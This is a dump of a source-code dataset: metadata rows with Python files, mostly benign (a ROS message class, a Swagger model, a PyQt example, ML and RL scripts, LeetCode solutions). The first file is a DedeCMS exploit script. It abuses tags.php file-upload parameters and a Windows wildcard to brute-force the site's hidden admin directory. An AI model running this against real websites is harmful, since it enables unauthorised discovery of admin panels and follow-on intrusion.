blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f851895535c8f43ebe64751ebaf22d82378cf452 | 1e0b77feea4aa08f2aa9ff63feddbc818428a350 | /script/dedecms/dedecms_win_find_manage.py | 77efcee0ec9487364ba143234992930c3a5232e7 | [] | no_license | cleanmgr112/Tentacle | 838b915430166429da3fe4ed290bef85d793fae4 | 175e143fc08d1a6884a126b7da019ef126e116fa | refs/heads/master | 2022-12-08T06:36:28.706843 | 2020-08-26T14:06:35 | 2020-08-26T14:06:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,769 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @author: 'orleven'
import itertools
from lib.utils.connect import ClientSession
from lib.core.enums import VUL_LEVEL
from lib.core.enums import VUL_TYPE
from lib.core.enums import SERVICE_PORT_MAP
from script import Script
class POC(Script):
def __init__(self, target=None):
self.service_type = SERVICE_PORT_MAP.WEB
self.name = 'dedecms win manager'
self.keyword = ['dedecms', 'win', 'manager']
self.info = 'Find manager for dedecms'
self.type = VUL_LEVEL.MEDIUM
self.level = VUL_LEVEL.INFO
self.refer = 'https://xz.aliyun.com/t/2064'
Script.__init__(self, target=target, service_type=self.service_type)
async def prove(self):
await self.get_url()
if self.base_url:
characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#"
_data = {
"_FILES[mochazz][tmp_name]": "./{p}<</images/adminico.gif",
"_FILES[mochazz][name]": 0,
"_FILES[mochazz][size]": 0,
"_FILES[mochazz][type]": "image/gif"
}
path_list = list(set([
self.url_normpath(self.base_url, '/'),
self.url_normpath(self.base_url, '../dedecms/'),
self.url_normpath(self.url, 'dedecms/'),
self.url_normpath(self.url, '../dedecms/'),
]))
async with ClientSession() as session:
for path in path_list:
url = path + 'tags.php'
back_dir = ""
flag = 0
async with session.get(url=url) as res:
if res!=None and res.status ==200:
for num in range(1, 7):
if flag ==1 :
break
for pre in itertools.permutations(characters, num):
pre = ''.join(list(pre))
_data["_FILES[mochazz][tmp_name]"] = _data["_FILES[mochazz][tmp_name]"].format(p=pre)
async with session.post(url=url, data=_data) as r:
if r!=None:
if r.status == 405:
return
text = await r.text()
if "Upload filetype not allow !" not in text and r.status == 200:
flag = 1
back_dir = pre
_data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
break
else:
_data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
flag = 0
x = 0
for i in range(30):
if flag == 1:
x = i
break
for ch in characters:
if ch == characters[-1]:
flag = 1
x = i
break
_data["_FILES[mochazz][tmp_name]"] = _data["_FILES[mochazz][tmp_name]"].format(p=back_dir + ch)
async with session.post(url=url, data=_data) as r:
if r!=None:
if r.status == 405:
return
text = await r.text()
if "Upload filetype not allow !" not in text and r.status == 200:
back_dir += ch
_data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
break
else:
_data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
if x < 29 and flag ==1:
self.flag = 1
self.req.append({"url": path+ '/'+back_dir})
self.res.append({"info": path+'/'+ back_dir, "key": 'dede_manager'})
| [
"[email protected]"
] | |
fd665f4ee1a672d4be5eb93dc6f5a52a578af62d | cf297c3d66189d2bd9fd8bfdadaeff3ebe6eee05 | /WebBrickLibs/EventHandlers/tests/DummyRouter.py | aeb6ebe6d84716938a3c453ac113956c324b0805 | [
"BSD-3-Clause"
] | permissive | AndyThirtover/wb_gateway | 0cb68a1f2caf7f06942f94b867ea02f4f8695492 | 69f9c870369085f4440033201e2fb263a463a523 | refs/heads/master | 2022-01-19T00:07:20.456346 | 2022-01-05T21:08:16 | 2022-01-05T21:08:16 | 14,687,973 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,228 | py | # Copyright L.P.Klyne 2013
# Licenced under 3 clause BSD licence
# $Id: DummyRouter.py 2612 2008-08-11 20:08:49Z graham.klyne $
#
# Some test helpers for testing event handlers. Uses a SuperGlobal to save state.
#
import logging
import sys
import unittest
from EventLib.Event import Event, makeEvent
from EventHandlers.BaseHandler import *
# a dummy router to log data
class DummyRouter(object):
def __init__( self ):
self._log = logging.getLogger( "DummyRouter" )
self._subs = list()
self._unsubs = list()
self._pubs = list()
def logMe(self):
# write all stuff to the log
self._log.debug( "logMe" )
def subscribe(self, interval, handler, evtype=None, source=None):
self._subs.append( (interval,handler,evtype,source) )
self._log.debug( "subscribe: %i, %s, %s, %s" % (interval,handler,evtype,source) )
def unsubscribe(self, handler, evtype=None, source=None):
self._unsubs.append( (handler,evtype,source) )
self._log.debug( "unsubscribe: %s, %s, %s" % (handler,evtype,source) )
def publish(self, source, event):
self._pubs.append( (source,event) )
self._log.debug( "publish: %s, %s" % (source,event) )
| [
"[email protected]"
] | |
5c22c50092409f049081caf5752155a483abf51f | 6656c2acc607d269870d04d310e8a35ebbad8d3f | /lib/python2.7/dist-packages/pr2_mechanism_controllers/msg/_Odometer.py | 3a8c8d7ac9f8a3aacb42386f5ce327b54bf4e2bf | [] | no_license | uml-comp4510-5490/install | 97bd8b643773e34f3956e40ac169729a45e34bbe | 2897bf668177aced2e58cac18e86b109716c01df | refs/heads/master | 2020-04-01T05:59:56.541628 | 2018-10-14T01:52:57 | 2018-10-14T01:52:57 | 152,929,072 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,835 | py | # This Python file uses the following encoding: utf-8
"""autogenerated by genpy from pr2_mechanism_controllers/Odometer.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
class Odometer(genpy.Message):
_md5sum = "1f1d53743f4592ee455aa3eaf9019457"
_type = "pr2_mechanism_controllers/Odometer"
_has_header = False #flag to mark the presence of a Header object
_full_text = """float64 distance #total distance traveled (meters)
float64 angle #total angle traveled (radians)"""
__slots__ = ['distance','angle']
_slot_types = ['float64','float64']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
distance,angle
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(Odometer, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.distance is None:
self.distance = 0.
if self.angle is None:
self.angle = 0.
else:
self.distance = 0.
self.angle = 0.
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self
buff.write(_get_struct_2d().pack(_x.distance, _x.angle))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
end = 0
_x = self
start = end
end += 16
(_x.distance, _x.angle,) = _get_struct_2d().unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self
buff.write(_get_struct_2d().pack(_x.distance, _x.angle))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
end = 0
_x = self
start = end
end += 16
(_x.distance, _x.angle,) = _get_struct_2d().unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
_struct_2d = None
def _get_struct_2d():
global _struct_2d
if _struct_2d is None:
_struct_2d = struct.Struct("<2d")
return _struct_2d
| [
"[email protected]"
] | |
463634d045761a2bc6089838b2810c79f55472c6 | e519a3134e5242eff29a95a05b02f8ae0bfde232 | /services/control-tower/vendor/riffyn-sdk/swagger_client/models/apply_config_body_manual_data.py | aa75dfca4effe3afe375954d8a1513babe352a82 | [] | no_license | zoltuz/lab-automation-playground | ba7bc08f5d4687a6daa64de04c6d9b36ee71bd3e | 7a21f59b30af6922470ee2b20651918605914cfe | refs/heads/master | 2023-01-28T10:21:51.427650 | 2020-12-04T14:13:13 | 2020-12-05T03:27:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,229 | py | # coding: utf-8
"""
Riffyn REST API
### Vocabulary Before you begin, please familiarize yourself with our [Glossary of Terms](https://help.riffyn.com/hc/en-us/articles/360045503694). ### Getting Started If you'd like to play around with the API, there are several free GUI tools that will allow you to send requests and receive responses. We suggest using the free app [Postman](https://www.getpostman.com/). ### Authentication Begin with a call the [authenticate](/#api-Authentication-authenticate) endpoint using [HTTP Basic authentication](https://en.wikipedia.org/wiki/Basic_access_authentication) with your `username` and `password` to retrieve either an API Key or an Access Token. For example: curl -X POST -u '<username>' https://api.app.riffyn.com/v1/auth -v You may then use either the API Key or the accessToken for all future requests to the API. For example: curl -H 'access-token: <ACCESS_TOKEN>' https://api.app.riffyn.com/v1/units -v curl -H 'api-key: <API_KEY>' https://api.app.riffyn.com/v1/units -v The tokens' values will be either in the message returned by the `/authenticate` endpoint or in the createApiKey `/auth/api-key` or CreateAccesToken `/auth/access-token` endpoints. The API Key will remain valid until it is deauthorized by revoking it through the Security Settings in the Riffyn App UI. The API Key is best for running scripts and longer lasting interactions with the API. The Access Token will expire automatically and is best suited to granting applications short term access to the Riffyn API. Make your requests by sending the HTTP header `api-key: $API_KEY`, or `access-token: $ACCESS_TOKEN`. In Postman, add your prefered token to the headers under the Headers tab for any request other than the original request to `/authenticate`. If you are enrolled in MultiFactor Authentication (MFA) the `status` returned by the `/authenticate` endpoint will be `MFA_REQUIRED`. A `passCode`, a `stateToken`, and a `factorId` must be passed to the [/verify](/#api-Authentication-verify) endpoint to complete the authentication process and achieve the `SUCCESS` status. MFA must be managed in the Riffyn App UI. ### Paging and Sorting The majority of endpoints that return a list of data support paging and sorting through the use of three properties, `limit`, `offset`, and `sort`. Please see the list of query parameters, displayed below each endpoint's code examples, to see if paging or sorting is supported for that specific endpoint. Certain endpoints return data that's added frequently, like resources. As a result, you may want filter results on either the maximum or minimum creation timestamp. This will prevent rows from shifting their position from the top of the list, as you scroll though subsequent pages of a multi-page response. Before querying for the first page, store the current date-time (in memory, a database, a file...). On subsequent pages you *may* include the `before` query parameter, to limit the results to records created before that date-time. E.g. before loading page one, you store the current date time of `2016-10-31T22:00:00Z` (ISO date format). Later, when generating the URL for page two, you *could* limit the results by including the query parameter `before=1477951200000` (epoch timestamp). ### Postman endpoint examples There is a YAML file with the examples of the request on Riffyn API [Click here](/collection) to get the file. If you don't know how to import the collection file, [here](https://learning.postman.com/docs/postman/collections/data-formats/#importing-postman-data) are the steps. ### Client SDKs You may write your own API client, or you may use one of ours. [Click here](/clients) to select your programming language and download an API client. # noqa: E501
OpenAPI spec version: 1.4.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class ApplyConfigBodyManualData(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'manual_data_id': 'str',
'value': 'str'
}
attribute_map = {
'manual_data_id': 'manualDataId',
'value': 'value'
}
def __init__(self, manual_data_id=None, value=None): # noqa: E501
"""ApplyConfigBodyManualData - a model defined in Swagger""" # noqa: E501
self._manual_data_id = None
self._value = None
self.discriminator = None
if manual_data_id is not None:
self.manual_data_id = manual_data_id
if value is not None:
self.value = value
@property
def manual_data_id(self):
"""Gets the manual_data_id of this ApplyConfigBodyManualData. # noqa: E501
The id of the manual data such as `manual|MDQi5Neznum3gXye3`. # noqa: E501
:return: The manual_data_id of this ApplyConfigBodyManualData. # noqa: E501
:rtype: str
"""
return self._manual_data_id
@manual_data_id.setter
def manual_data_id(self, manual_data_id):
"""Sets the manual_data_id of this ApplyConfigBodyManualData.
The id of the manual data such as `manual|MDQi5Neznum3gXye3`. # noqa: E501
:param manual_data_id: The manual_data_id of this ApplyConfigBodyManualData. # noqa: E501
:type: str
"""
self._manual_data_id = manual_data_id
@property
def value(self):
"""Gets the value of this ApplyConfigBodyManualData. # noqa: E501
The value being set for the manual data. Values will be cast to the valueType of the property they are being written to. Datetimes should be supplied in ISO-8601 format (2019-05-30T15:37:54+00:00). # noqa: E501
:return: The value of this ApplyConfigBodyManualData. # noqa: E501
:rtype: str
"""
return self._value
@value.setter
def value(self, value):
"""Sets the value of this ApplyConfigBodyManualData.
The value being set for the manual data. Values will be cast to the valueType of the property they are being written to. Datetimes should be supplied in ISO-8601 format (2019-05-30T15:37:54+00:00). # noqa: E501
:param value: The value of this ApplyConfigBodyManualData. # noqa: E501
:type: str
"""
self._value = value
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(ApplyConfigBodyManualData, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ApplyConfigBodyManualData):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"[email protected]"
] | |
61f7e1110562904492dddc8c101dfdb04a9f0b79 | 2009735d19318a3ffe8e56687efb8e7688ebaf5a | /models/final_experiment_scripts/MIMIC/LoS/channel_wise_lstm.py | 672a261444acf134a165a8bd320b316b08fb5d3f | [
"MIT"
] | permissive | weikunzz/TPC-LoS-prediction | 7bb9865e2f0fa3b461cb6fc23ed49996bfba59c1 | 30770f3e75d6a2a725c422b837f7ec864708f5d9 | refs/heads/master | 2023-04-06T10:19:12.284137 | 2021-04-08T14:06:53 | 2021-04-08T14:06:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 834 | py | from eICU_preprocessing.split_train_test import create_folder
from models.run_lstm import BaselineLSTM
from models.initialise_arguments import initialise_lstm_arguments
from models.final_experiment_scripts.best_hyperparameters import best_cw_lstm
if __name__=='__main__':
c = initialise_lstm_arguments()
c['exp_name'] = 'ChannelwiseLSTM'
c['dataset'] = 'MIMIC'
c = best_cw_lstm(c)
log_folder_path = create_folder('models/experiments/final/MIMIC/LoS', c.exp_name)
channelwise_lstm = BaselineLSTM(config=c,
n_epochs=c.n_epochs,
name=c.exp_name,
base_dir=log_folder_path,
explogger_kwargs={'folder_format': '%Y-%m-%d_%H%M%S{run_number}'})
channelwise_lstm.run() | [
"[email protected]"
] | |
0d7102130db2739bb99c1c008e466724c33ed4b7 | 583d03a6337df9f1e28f4ef6208491cf5fb18136 | /dev4qx/messagepush/task/subscribe.py | be4fdbc0be1cdda9998b0a83fc02a876b7637185 | [] | no_license | lescpsn/lescpsn | ece4362a328f009931c9e4980f150d93c4916b32 | ef83523ea1618b7e543553edd480389741e54bc4 | refs/heads/master | 2020-04-03T14:02:06.590299 | 2018-11-01T03:00:17 | 2018-11-01T03:00:17 | 155,309,223 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,146 | py | # -*- coding: utf-8 -*-
import logging
import tornado
from core.subscribe import subscrible_direct
request_log = logging.getLogger("ms.request")
class SubscribeTask(tornado.ioloop.PeriodicCallback):
def __init__(self, application, callback_time):
super(SubscribeTask, self).__init__(self.run, callback_time)
self.application = application
self.master = self.application.sentinel.master_for('madeira')
@tornado.gen.coroutine
def run(self):
# TODO: try
try:
r = self.master
# TODO: return types is empty
types = r.smembers('types')
if types is None:
self.finish('type空')
elif types is not None:
msg_type = r.spop('types')
func = self.application.config['subscrible'].get(msg_type)
request_log.info('GET TASK_MESSAGE %s %s %s', types, msg_type, func)
if func == 'direct':
yield subscrible_direct(self.application, msg_type)
except:
request_log.exception('FAIL')
| [
"[email protected]"
] | |
fbefcb0112cca43cc7b8a399c2dde0d4ca329f56 | 182c651a9b00b9b4d80e6d51ae574cb793958cd6 | /widgets/stylesheet/stylesheet.py | f9c37d6886961ae308ad487c3780ee79e8573ba3 | [] | no_license | eudu/pyqt-examples | c61a7108e1fbfcf2cd918a0f99e9a5a90a3f305c | 8e533b7b3c5e9bbe0617ef1ecb9b169dd216c181 | refs/heads/master | 2020-03-16T01:23:19.573347 | 2018-05-06T20:20:57 | 2018-05-06T20:20:57 | 132,438,940 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,546 | py | #!/usr/bin/python3
#############################################################################
##
## Copyright (C) 2013 Riverbank Computing Limited
## Copyright (C) 2010 Hans-Peter Jansen <[email protected]>.
## Copyright (C) 2010 Nokia Corporation and/or its subsidiary(-ies).
## All rights reserved.
##
## This file is part of the examples of PyQt.
##
## $QT_BEGIN_LICENSE:BSD$
## You may use this file under the terms of the BSD license as follows:
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are
## met:
## * Redistributions of source code must retain the above copyright
## notice, this list of conditions and the following disclaimer.
## * Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in
## the documentation and/or other materials provided with the
## distribution.
## * Neither the name of Nokia Corporation and its Subsidiary(-ies) nor
## the names of its contributors may be used to endorse or promote
## products derived from this software without specific prior written
## permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
## "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
## LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
## A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
## OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
## SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
## LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
## DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
## THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
## (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
## OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
## $QT_END_LICENSE$
##
###########################################################################
from PyQt5.QtWidgets import QApplication, QLabel, QMainWindow, QMessageBox
import stylesheet_rc
from ui_mainwindow import Ui_MainWindow
from stylesheeteditor import StyleSheetEditor
class MainWindow(QMainWindow):
def __init__(self):
super(MainWindow, self).__init__()
self.ui = Ui_MainWindow()
self.ui.setupUi(self)
self.ui.nameLabel.setProperty('class', 'mandatory QLabel')
self.styleSheetEditor = StyleSheetEditor(self)
self.statusBar().addWidget(QLabel("Ready"))
self.ui.exitAction.triggered.connect(QApplication.instance().quit)
self.ui.aboutQtAction.triggered.connect(QApplication.instance().aboutQt)
def on_editStyleAction_triggered(self):
self.styleSheetEditor.show()
self.styleSheetEditor.activateWindow()
def on_aboutAction_triggered(self):
QMessageBox.about(self, "About Style sheet",
"The <b>Style Sheet</b> example shows how widgets can be "
"styled using "
"<a href=\"http://doc.qt.digia.com/4.5/stylesheet.html\">Qt "
"Style Sheets</a>. Click <b>File|Edit Style Sheet</b> to pop "
"up the style editor, and either choose an existing style "
"sheet or design your own.")
if __name__ == '__main__':
import sys
app = QApplication(sys.argv)
window = MainWindow()
window.show()
sys.exit(app.exec_())
| [
"[email protected]"
] | |
1f77afe28d0cb282cba9d56049db486e0e6d1c6f | d39bf3e0141f39752b40ca420ec7d90204ad4219 | /tests/test_day_02.py | 213be9a1bfceacdaa6696775d1b77d416bee4eb0 | [] | no_license | jasonbrackman/advent_of_code_2017 | 33260d98e1c348b8d249eabe425783568c3db494 | a50e0cf9b628da96cb365744027d1a800557d1c9 | refs/heads/master | 2022-02-18T18:06:58.119383 | 2019-09-12T05:00:02 | 2019-09-12T05:00:02 | 112,784,403 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 957 | py | """
5 1 9 5
7 5 3
2 4 6 8
The first row's largest and smallest values are 9 and 1, and their difference is 8.
The second row's largest and smallest values are 7 and 3, and their difference is 4.
The third row's difference is 6.
In this example, the spreadsheet's checksum would be 8 + 4 + 6 = 18.
What is the checksum for the spreadsheet in your puzzle input?
"""
import pytest
from .. import day_02
@pytest.mark.parametrize('param, expect', [('5 1 9 5', 8),
('7 5 3', 4),
('2 4 6 8', 6)])
def test_min_max_diff(param, expect):
assert day_02.min_max_dif(param) == expect
@pytest.mark.parametrize('param, expect', [('5 9 2 8', 4),
('9 4 7 3', 3),
('3 8 6 5', 2)])
def test_get_divisible_result(param, expect):
assert day_02.get_divisible_result(param) == expect | [
"[email protected]"
] | |
9e8347f3ee2a079d974e2bdbee6c34880736fe6e | d8a9b88f4087ebfe97b462e589071222e2261e47 | /520. Detect Capital.py | 05ac6786a14cb0b3bec7c1c660096e885cf8269c | [] | no_license | rohitpatwa/leetcode | a7a4e8a109ace53a38d613b5f898dd81d4771b1b | f4826763e8f154cac9134d53b154b8299acd39a8 | refs/heads/master | 2021-07-07T12:40:30.424243 | 2021-03-31T00:21:30 | 2021-03-31T00:21:30 | 235,003,084 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 379 | py | # Check if word is all upper or all lower. elif check if word is one capital and all lower. Else return False.
class Solution:
def detectCapitalUse(self, word: str) -> bool:
if word==word.upper() or word==word.lower():
return True
if word[0] == word[0].upper() and word[1:]==word[1:].lower():
return True
return False | [
"[email protected]"
] | |
871132389561d6b5b48a9d5e7d876bc1654d5ee6 | f2889a13368b59d8b82f7def1a31a6277b6518b7 | /30.py | 75414b4d6be012ed0fdb069967fc9cd91daa06d6 | [] | no_license | htl1126/leetcode | dacde03de5c9c967e527c4c3b29a4547154e11b3 | c33559dc5e0bf6879bb3462ab65a9446a66d19f6 | refs/heads/master | 2023-09-01T14:57:57.302544 | 2023-08-25T15:50:56 | 2023-08-25T15:50:56 | 29,514,867 | 7 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,038 | py | # ref: https://discuss.leetcode.com/topic/10665/concise-python-code-using
# -defaultdict
import collections
import copy
class Solution(object):
def findSubstring(self, s, words):
"""
:type s: str
:type words: List[str]
:rtype: List[int]
"""
if not words or not words[0]:
return None
wl, total, strlen, res = (len(words[0]), len(words) * len(words[0]),
len(s), [])
word_ctr = collections.Counter(words)
for i in xrange(wl):
j = i
count = copy.copy(word_ctr)
while j < strlen - wl + 1:
count[s[j:j + wl]] -= 1
while count[s[j:j + wl]] < 0:
count[s[i:i + wl]] += 1
i += wl
j += wl
if j - i == total:
res += i,
return res
if __name__ == '__main__':
sol = Solution()
print sol.findSubstring('barfoothefoobarman', ['foo', 'bar'])
| [
"[email protected]"
] | |
ef8b694de6c2ac6d30f02461ff1ca3cdcf3cd010 | 837377dc4df28263a61ee4af32514b52f3beb976 | /scripts/inverse_reinforcement_learning/envs/gridworld.py | a35a714dc92bf33cb95d8012cb7d6d70b952727c | [] | no_license | aoyan27/reinforcement_learning | 2279a36c1ba0cec1f4e254af71ebb6e6431b5636 | 9170e9e720e0e1a541b586465e01bd89555d27f2 | refs/heads/master | 2021-09-08T01:21:53.630653 | 2018-03-05T03:19:59 | 2018-03-05T03:19:59 | 100,631,850 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,341 | py | #!/usr/bin.env python
#coding:utf-8
import numpy as np
class Gridworld:
def __init__(self, rows, cols, R_max, noise):
self.rows = rows
self.cols = cols
self.n_state = self.rows * self.cols
self.R_max = R_max
self.noise = noise
self.grid = np.zeros((self.rows, self.cols))
# +----------------> x
# |
# |
# |
# |
# |
# |
# V
# y
self.goal = (self.rows-1, self.cols-1)
self.grid[self.goal] = self.R_max
self.action_list = [0, 1, 2, 3, 4]
self.n_action = len(self.action_list)
self.dirs = {0: '>', 1: '<', 2: 'v', 3: '^', 4: '-'}
self.state_ = None
self.out_of_range_ = None
def state2index(self, state):
# state[0] : y
# state[1] : x
# return state[1] + self.cols * state[0]
return state[0] + self.cols * state[1]
def index2state(self, index):
state = [0, 0]
state[0] = index % self.cols
state[1] = index / self.cols
return state
def get_next_state_and_probs(self, state, action):
transition_probability = 1 - self.noise
probs = np.zeros([self.n_action])
probs[int(action)] = transition_probability
probs += self.noise / self.n_action
# print "probs : "
# print probs
next_state_list = []
for a in xrange(self.n_action):
if state != list(self.goal):
# print "state : ", state
next_state, out_of_range = self.move(state, a)
self.out_of_range_ = out_of_range
# print "next_state() : "
# print next_state
next_state_list.append(next_state)
if out_of_range:
probs[self.n_action-1] += probs[a]
probs[a] = 0
else:
next_state = state
# print "probs[", a, "] : ", probs[a]
if a != self.n_action-1:
probs[self.n_action-1] += probs[a]
probs[a] = 0
next_state_list.append(next_state)
# print "next_state_ : "
# print next_state
# print "next_state_list : "
# print next_state_list
# print "probs_ : "
# print probs
return next_state_list, probs
def get_transition_matrix(self):
P = np.zeros((self.n_state, self.n_state, self.n_action), dtype=np.float32)
for state_index in xrange(self.n_state):
state = self.index2state(state_index)
# print "state : ", state
for action_index in xrange(self.n_action):
action = self.action_list[action_index]
# print "action : ", action
next_state_list, probs = self.get_next_state_and_probs(state, action)
# print "next_state_list : ", next_state_list
# print "probs : ", probs
for i in xrange(len(probs)):
next_state = next_state_list[i]
# print "next_state : ", next_state
next_state_index = self.state2index(next_state)
probability = probs[i]
# print "probability : ", probability
P[state_index, next_state_index, action_index] = probability
# print "P : "
# print P
# print P.shape
return P
def move(self, state, action):
y, x = state
if action == 0:
# right
x = x + 1
elif action == 1:
# left
x = x - 1
elif action == 2:
# down
y = y + 1
elif action == 3:
# up
y = y - 1
else:
# stay
x = x
y = y
out_of_range = False
if x < 0:
x = 0
out_of_range = True
elif x > (self.cols-1):
x = self.cols - 1
out_of_range = True
if y < 0:
y = 0
out_of_range = True
elif y > (self.rows-1):
y = self.rows - 1
out_of_range = True
return [y, x], out_of_range
def show_policy(self, policy, deterministic=True):
vis_policy = np.array([])
if deterministic:
for i in xrange(len(policy)):
vis_policy = np.append(vis_policy, self.dirs[policy[i]])
# print self.dirs[policy[i]]
else:
# for i in xrange(len(policy)):
# # print "np.sum(policy[s]) : ", np.sum(policy[i])
# random_num = np.random.rand()
# # print "random_num : ", random_num
# action_index = 0
# for j in xrange(len(policy[i])):
# random_num -= policy[i][j]
# # print "random_num_ : ", random_num
# if random_num < 0:
# action_index = j
# break
# vis_policy = np.append(vis_policy, self.dirs[action_index])
# # print self.dirs[action_index]
for i in xrange(len(policy)):
vis_policy = np.append(vis_policy, self.dirs[np.argmax(policy[i])])
vis_policy = vis_policy.reshape((self.rows, self.cols)).transpose()
vis_policy[self.goal] = 'G'
print vis_policy
def terminal(self, state):
episode_end = False
if state == list(self.goal):
episode_end = True
return episode_end
def reset(self, start_position=[0,0]):
self.state_ = start_position
return self.state_
def step(self, action, reward_map=None):
next_state_list, probs = self.get_next_state_and_probs(self.state_, action)
# print "next_state_list : ", next_state_list
# print "probs : ", probs
random_num = np.random.rand()
# print "random_num : ", random_num
index = 0
for i in xrange(len(probs)):
random_num -= probs[i]
# print "random_num_ : ", random_num
if random_num < 0:
index = i
break
# print "index : ", index
# print "next_state : ", next_state_list[index]
self.state_ = next_state_list[index]
# self.state_, _ = self.move(self.state_, action)
reward = None
if reward_map is None:
if self.state_ == list(self.goal):
reward = self.R_max
else:
reward = 0
else:
reward = reward_map[self.state2index(self.state_)]
# print "reward : ", reward
episode_end = self.terminal(self.state_)
